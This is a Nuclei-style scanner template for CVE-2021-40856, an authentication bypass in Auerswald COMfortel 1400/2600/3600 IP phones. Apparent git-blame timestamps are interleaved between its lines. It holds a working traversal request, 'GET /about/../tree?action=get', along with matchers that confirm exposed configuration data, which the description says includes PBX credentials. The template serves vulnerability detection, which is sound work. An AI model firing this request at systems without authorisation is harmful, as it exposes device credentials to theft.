2021-12-08 00:54:30 +00:00
id : CVE-2021-40856
info :
name : Auerswald COMfortel 1400/2600/3600 IP - Authentication Bypass
author : gy741
2021-12-20 14:33:22 +00:00
severity : high
2022-05-17 09:18:12 +00:00
description : Auerswald COMfortel 1400/2600/3600 IP is susceptible to an authentication bypass vulnerability. Inserting the prefix "/about/../" allows bypassing the authentication check for the web-based configuration management interface. This enables attackers to gain access to the login credentials used for authentication at the PBX, among other data.
2021-12-08 00:54:30 +00:00
reference :
2022-03-17 17:01:45 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2021-40856
2021-12-08 00:54:30 +00:00
- https://www.redteam-pentesting.de/en/advisories/rt-sa-2021-004/-auerswald-comfortel-1400-2600-3600-ip-authentication-bypass
2022-05-17 09:18:12 +00:00
- https://www.redteam-pentesting.de/en/advisories/-advisories-publicised-vulnerability-analyses
- http://packetstormsecurity.com/files/165162/Auerswald-COMfortel-1400-2600-3600-IP-2.8F-Authentication-Bypass.html
2021-12-20 14:33:22 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
2022-04-22 10:38:41 +00:00
cvss-score : 7.5
2021-12-20 14:33:22 +00:00
cve-id : CVE-2021-40856
cwe-id : CWE-287
2022-04-22 10:38:41 +00:00
tags : cve,cve2021,comfortel,auth-bypass,auerswald
2021-12-08 00:54:30 +00:00
requests :
- raw :
- |
GET /about/../tree?action=get HTTP/1.1
Host : {{Hostname}}
Accept : */*
matchers-condition : and
matchers :
- type : word
part : body
2021-12-08 04:55:18 +00:00
words :
- '"TYPE"'
- '"ITEMS"'
- '"COUNT"'
2021-12-08 00:54:30 +00:00
condition : and
- type : word
2021-12-08 04:55:18 +00:00
part : header
2021-12-08 00:54:30 +00:00
words :
- application/json
- type : status
status :
- 200
2022-03-17 17:01:45 +00:00
# Enhanced by mp on 2022/03/16